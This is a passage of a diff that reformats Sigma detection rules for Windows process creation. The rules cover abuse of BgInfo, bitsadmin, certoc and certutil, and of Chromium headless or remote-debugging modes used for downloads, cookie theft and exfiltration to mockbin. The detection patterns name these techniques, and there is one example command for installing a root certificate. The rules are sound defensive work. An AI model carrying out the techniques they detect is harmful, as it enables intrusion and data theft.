"BgInfo.exe" which could be a sign - of potential abuse of the binary to proxy execution via external VBScript +description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/ - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ @@ -29,22 +28,22 @@ detection: - \bginfo.exe - \bginfo64.exe selection_child: - - NewProcessName|endswith: - - \calc.exe - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \notepad.exe - - \powershell.exe - - \pwsh.exe - - \wscript.exe - - NewProcessName|contains: - - \AppData\Local\ - - \AppData\Roaming\ - - :\Users\Public\ - - :\Temp\ - - :\Windows\Temp\ - - :\PerfLogs\ + - NewProcessName|endswith: + - \calc.exe + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \notepad.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + - NewProcessName|contains: + - \AppData\Local\ + - \AppData\Roaming\ + - :\Users\Public\ + - :\Temp\ + - :\Windows\Temp\ + - :\PerfLogs\ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml index 799ff6d9d..651979187 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml @@ -1,11 +1,10 @@ title: Uncommon Child Process Of BgInfo.EXE id: aaf46cdc-934e-4284-b329-34aa701e3771 related: - - id: 811f459f-9231-45d4-959a-0266c6311987 - type: similar + - id: 811f459f-9231-45d4-959a-0266c6311987 + type: similar status: test -description: Detects uncommon child processes of "BgInfo.exe" which could be a sign - of potential abuse of the binary to proxy execution via external VBScript +description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/ - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download.yml index b951b99ab..2070769b5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download.yml @@ -23,16 +23,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - NewProcessName|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_cmd: - CommandLine|contains: ' /transfer ' + CommandLine|contains: ' /transfer ' selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' /create ' - ' /addfile ' selection_cli_2: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (selection_img and (selection_cmd or all of selection_cli_*)) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml index ef450a7af..c14fb7ff8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml @@ -1,11 +1,10 @@ title: Suspicious Download From Direct IP Via Bitsadmin id: 99c840f2-2012-46fd-9141-c761987550ef related: - - id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7 - type: similar + - id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7 + type: similar status: test -description: Detects usage of bitsadmin downloading a file using an URL that contains - an IP +description: Detects usage of bitsadmin downloading a file using an URL that contains an IP references: - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - https://isc.sans.edu/diary/22264 @@ -28,15 +27,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - NewProcessName|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_extension: - CommandLine|contains: + CommandLine|contains: - ://1 - ://2 - ://3 @@ -47,7 +46,7 @@ detection: - ://8 - ://9 filter_seven_zip: - CommandLine|contains: ://7- + CommandLine|contains: ://7- # For https://7-zip.org/ condition: process_creation and (all of selection_* and not 1 of filter_*) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml index 7c109485c..6a6ae4df1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml @@ -25,16 +25,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - NewProcessName|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_domain: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml index c103d447c..320e6710b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml @@ -23,15 +23,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - NewProcessName|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_extension: - CommandLine|contains: + CommandLine|contains: - .7z - .asax - .ashx diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml index 8cf9c8fde..6a291ea61 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml @@ -1,8 +1,7 @@ title: File Download Via Bitsadmin To A Suspicious Target Folder id: 2ddef153-167b-4e89-86b6-757a9e65dcac status: experimental -description: Detects usage of bitsadmin downloading a file to a suspicious target - folder +description: Detects usage of bitsadmin downloading a file to a suspicious target folder references: - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - https://isc.sans.edu/diary/22264 @@ -25,15 +24,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - NewProcessName|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_folder: - CommandLine|contains: + CommandLine|contains: - :\Perflogs - :\ProgramData\ - :\Temp\ diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml index 3d7b40e10..5303ad955 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml @@ -24,15 +24,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - NewProcessName|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_folder: - CommandLine|contains: + CommandLine|contains: - '%AppData%' - '%temp%' - '%tmp%' diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml index 266aeb0e5..2dd67eaaa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml @@ -1,12 +1,7 @@ title: Monitoring For Persistence Via BITS id: b9cbbc17-d00d-4e3d-a827-b06d03d2380d status: test -description: BITS will allow you to schedule a command to execute after a successful - download to notify you that the job is finished. When the job runs on the system - the command specified in the BITS job will be executed. This can be abused by - actors to create a backdoor within the system and for persistence. It will be - chained in a BITS job to schedule the download of malware/additional binaries - and execute the program after being downloaded +description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded references: - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html - http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html @@ -25,18 +20,18 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - bitsadmin - /SetNotifyCmdLine - CommandLine|contains: + CommandLine|contains: - '%COMSPEC%' - cmd.exe - regsvr32.exe selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - bitsadmin - /Addfile - CommandLine|contains: + CommandLine|contains: - 'http:' - 'https:' - 'ftp:' diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml index 92e4b364b..a3238bf6a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml @@ -1,12 +1,10 @@ title: Potential Data Stealing Via Chromium Headless Debugging id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4 related: - - id: b3d34dc5-2efd-4ae3-845f-8ec14921f449 - type: derived + - id: b3d34dc5-2efd-4ae3-845f-8ec14921f449 + type: derived status: test -description: Detects chromium based browsers starting in headless and debugging mode - and pointing to a user profile. This could be a sign of data stealing or remote - control +description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control references: - https://github.com/defaultnamehere/cookie_crimes/ - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password @@ -25,8 +23,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: - - --remote-debugging- + CommandLine|contains|all: + - --remote-debugging- # Covers: --remote-debugging-address, --remote-debugging-port, --remote-debugging-socket-name, --remote-debugging-pipe....etc - --user-data-dir - --headless condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml index 1cbd95e65..30d562632 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml @@ -1,8 +1,8 @@ title: Browser Execution In Headless Mode id: ef9dcfed-690c-4c5d-a9d1-482cd422225c related: - - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e - type: derived + - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e + type: derived status: test description: Detects execution of Chromium based browser in headless mode references: @@ -21,8 +21,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: --headless - NewProcessName|endswith: + CommandLine|contains: --headless + NewProcessName|endswith: - \brave.exe - \chrome.exe - \msedge.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml index 731b4548d..259a63b3b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml @@ -1,11 +1,10 @@ title: File Download with Headless Browser id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e related: - - id: ef9dcfed-690c-4c5d-a9d1-482cd422225c - type: derived + - id: ef9dcfed-690c-4c5d-a9d1-482cd422225c + type: derived status: test -description: Detects execution of chromium based browser in headless mode using the - "dump-dom" command line to download files +description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files references: - https://twitter.com/mrd0x/status/1478234484881436672?s=12 - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html @@ -23,11 +22,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - --headless - dump-dom - http - NewProcessName|endswith: + NewProcessName|endswith: - \brave.exe - \chrome.exe - \msedge.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_load_extension.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_load_extension.yml index b4d6b533a..4051656fa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_load_extension.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_load_extension.yml @@ -1,11 +1,10 @@ title: Chromium Browser Instance Executed With Custom Extension id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21 related: - - id: 27ba3207-dd30-4812-abbf-5d20c57d474e - type: similar + - id: 27ba3207-dd30-4812-abbf-5d20c57d474e + type: similar status: experimental -description: Detects a Chromium based browser process with the 'load-extension' flag - to start a instance with a custom extension +description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension references: - https://redcanary.com/blog/chromeloader/ - https://emkc.org/s/RJjuLa @@ -24,8 +23,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: --load-extension= - NewProcessName|endswith: + CommandLine|contains: --load-extension= + NewProcessName|endswith: - \brave.exe - \chrome.exe - \msedge.exe @@ -33,7 +32,6 @@ detection: - \vivaldi.exe condition: process_creation and selection falsepositives: - - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this - alert + - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml index 7240d01e5..304247d9f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml @@ -1,9 +1,7 @@ title: Chromium Browser Headless Execution To Mockbin Like Site id: 1c526788-0abe-4713-862f-b520da5e5316 status: experimental -description: Detects the execution of a Chromium based browser process with the "headless" - flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate - data). +description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data). references: - https://www.zscaler.com/blogs/security-research/steal-it-campaign author: X__Junior (Nextron Systems) @@ -18,16 +16,16 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \brave.exe - \chrome.exe - \msedge.exe - \opera.exe - \vivaldi.exe selection_headless: - CommandLine|contains: --headless + CommandLine|contains: --headless selection_url: - CommandLine|contains: + CommandLine|contains: - ://run.mocky - ://mockbin condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml index b1c079712..c7091b03f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml @@ -1,11 +1,10 @@ title: Suspicious Chromium Browser Instance Executed With Custom Extension id: 27ba3207-dd30-4812-abbf-5d20c57d474e related: - - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21 - type: similar + - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21 + type: similar status: experimental -description: Detects a suspicious process spawning a Chromium based browser process - with the 'load-extension' flag to start an instance with a custom extension +description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension references: - https://redcanary.com/blog/chromeloader/ - https://emkc.org/s/RJjuLa @@ -24,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: --load-extension= + CommandLine|contains: --load-extension= ParentProcessName|endswith: - \cmd.exe - \cscript.exe @@ -34,7 +33,7 @@ detection: - \regsvr32.exe - \rundll32.exe - \wscript.exe - NewProcessName|endswith: + NewProcessName|endswith: - \brave.exe - \chrome.exe - \msedge.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_inline_file_download.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_inline_file_download.yml index 130a6a474..38cfd10dc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_inline_file_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_inline_file_download.yml @@ -1,10 +1,7 @@ title: File Download From Browser Process Via Inline URL id: 94771a71-ba41-4b6e-a757-b531372eaab6 status: test -description: Detects execution of a browser process with a URL argument pointing to - a file with a potentially interesting extension. This can be abused to download - arbitrary files or to hide from the user for example by launching the browser - in a minimized state. +description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. references: - https://twitter.com/mrd0x/status/1478116126005641220 - https://lolbas-project.github.io/lolbas/Binaries/Msedge/ @@ -22,16 +19,16 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \brave.exe - \chrome.exe - \msedge.exe - \opera.exe - \vivaldi.exe selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_extensions: - CommandLine|endswith: + CommandLine|endswith: - .7z - .dat - .dll diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_remote_debugging.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_remote_debugging.yml index ca5300959..02dd69bad 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_remote_debugging.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_remote_debugging.yml @@ -1,11 +1,10 @@ title: Browser Started with Remote Debugging id: b3d34dc5-2efd-4ae3-845f-8ec14921f449 related: - - id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4 - type: derived + - id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4 + type: derived status: test -description: Detects browsers starting with the remote debugging flags. Which is a - technique often used to perform browser injection attacks +description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks references: - https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf - https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/ @@ -25,10 +24,11 @@ detection: EventID: 4688 Channel: Security selection_chromium_based: - CommandLine|contains: ' --remote-debugging-' + # Covers: --remote-debugging-address, --remote-debugging-port, --remote-debugging-socket-name, --remote-debugging-pipe....etc + CommandLine|contains: ' --remote-debugging-' selection_firefox: - CommandLine|contains: ' -start-debugger-server' - NewProcessName|endswith: \firefox.exe + CommandLine|contains: ' -start-debugger-server' + NewProcessName|endswith: \firefox.exe condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_tor_execution.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_tor_execution.yml index 8bffd8b70..a9cdd3ab4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_tor_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_tor_execution.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \tor.exe - \Tor Browser\Browser\firefox.exe condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_calc_uncommon_exec.yml b/sigma/builtin/process_creation/proc_creation_win_calc_uncommon_exec.yml index fce7ddb5d..c3288cce4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_calc_uncommon_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_calc_uncommon_exec.yml @@ -1,11 +1,8 @@ title: Suspicious Calculator Usage id: 737e618a-a410-49b5-bec3-9e55ff7fbc15 status: test -description: 'Detects suspicious use of ''calc.exe'' with command line parameters - or in a suspicious directory, which is likely caused by some PoC or detection - evasion. - - ' +description: | + Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion. references: - https://twitter.com/ItsReallyNick/status/1094080242686312448 author: Florian Roth (Nextron Systems) @@ -22,16 +19,15 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: '\calc.exe ' + CommandLine|contains: '\calc.exe ' selection_2: - NewProcessName|endswith: \calc.exe + NewProcessName|endswith: \calc.exe filter_main_known_locations: - NewProcessName|contains: + NewProcessName|contains: - :\Windows\System32\ - :\Windows\SysWOW64\ - :\Windows\WinSxS\ - condition: process_creation and (selection_1 or ( selection_2 and not filter_main_known_locations - )) + condition: process_creation and (selection_1 or ( selection_2 and not filter_main_known_locations )) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_certmgr_certificate_installation.yml b/sigma/builtin/process_creation/proc_creation_win_certmgr_certificate_installation.yml index 2393f2a32..3c339c4e2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certmgr_certificate_installation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certmgr_certificate_installation.yml @@ -1,18 +1,14 @@ title: New Root Certificate Installed Via CertMgr.EXE id: ff992eac-6449-4c60-8c1d-91c9722a1d48 related: - - id: 42821614-9264-4761-acfc-5772c3286f76 - type: derived - - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc - type: obsoletes + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived + - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc + type: obsoletes status: test -description: 'Detects execution of "certmgr" with the "add" flag in order to install - a new certificate on the system. - - Adversaries may install a root certificate on a compromised system to avoid warnings - when connecting to adversary controlled web servers. - - ' +description: | + Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. + Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md - https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/ @@ -25,19 +21,19 @@ logsource: category: process_creation product: windows detection: + # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all process_creation: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \CertMgr.exe - - OriginalFileName: CERTMGT.EXE + - NewProcessName|endswith: \CertMgr.exe + - OriginalFileName: CERTMGT.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /add - root condition: process_creation and (all of selection_*) falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need - to test if GPO push doesn't trigger FP + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_certoc_download.yml b/sigma/builtin/process_creation/proc_creation_win_certoc_download.yml index b18f0d73e..0d5f33a5e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certoc_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certoc_download.yml @@ -1,8 +1,8 @@ title: File Download via CertOC.EXE id: 70ad0861-d1fe-491c-a45f-fa48148a300d related: - - id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a - type: similar + - id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a + type: similar status: test description: Detects when a user downloads a file by using CertOC.exe references: @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - NewProcessName|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - -GetCACAPS - http condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_certoc_download_direct_ip.yml b/sigma/builtin/process_creation/proc_creation_win_certoc_download_direct_ip.yml index 0be9505b3..5018f6afa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certoc_download_direct_ip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certoc_download_direct_ip.yml @@ -1,8 +1,8 @@ title: File Download From IP Based URL Via CertOC.EXE id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a related: - - id: 70ad0861-d1fe-491c-a45f-fa48148a300d - type: similar + - id: 70ad0861-d1fe-491c-a45f-fa48148a300d + type: similar status: experimental description: Detects when a user downloads a file from an IP based URL using CertOC.exe references: @@ -21,12 +21,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - NewProcessName|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_cli: - CommandLine|contains: -GetCACAPS + CommandLine|contains: -GetCACAPS condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll.yml b/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll.yml index 9cdb842f0..4c950a553 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll.yml @@ -1,11 +1,10 @@ title: DLL Loaded via CertOC.EXE id: 242301bc-f92f-4476-8718-78004a6efd9f related: - - id: 84232095-ecca-4015-b0d7-7726507ee793 - type: similar + - id: 84232095-ecca-4015-b0d7-7726507ee793 + type: similar status: test -description: Detects when a user installs certificates by using CertOC.exe to loads - the target DLL file. +description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. references: - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2 @@ -24,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - NewProcessName|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -LoadDLL ' - ' /LoadDLL ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml b/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml index b0551af76..6e87dc062 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml @@ -1,11 +1,10 @@ title: Suspicious DLL Loaded via CertOC.EXE id: 84232095-ecca-4015-b0d7-7726507ee793 related: - - id: 242301bc-f92f-4476-8718-78004a6efd9f - type: similar + - id: 242301bc-f92f-4476-8718-78004a6efd9f + type: similar status: test -description: Detects when a user installs certificates by using CertOC.exe to load - the target DLL file. +description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file. references: - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2 @@ -23,14 +22,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - NewProcessName|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -LoadDLL ' - ' /LoadDLL ' selection_paths: - CommandLine|contains: + CommandLine|contains: - \Appdata\Local\Temp\ - \Desktop\ - \Downloads\ diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_certificate_installation.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_certificate_installation.yml index aec7d8f6d..6a713c6ac 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_certificate_installation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_certificate_installation.yml @@ -1,18 +1,14 @@ title: New Root Certificate Installed Via Certutil.EXE id: d2125259-ddea-4c1c-9c22-977eb5b29cf0 related: - - id: 42821614-9264-4761-acfc-5772c3286f76 - type: derived - - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc - type: obsoletes + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived + - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc + type: obsoletes status: test -description: 'Detects execution of "certutil" with the "addstore" flag in order to - install a new certificate on the system. - - Adversaries may install a root certificate on a compromised system to avoid warnings - when connecting to adversary controlled web servers. - - ' +description: | + Detects execution of "certutil" with 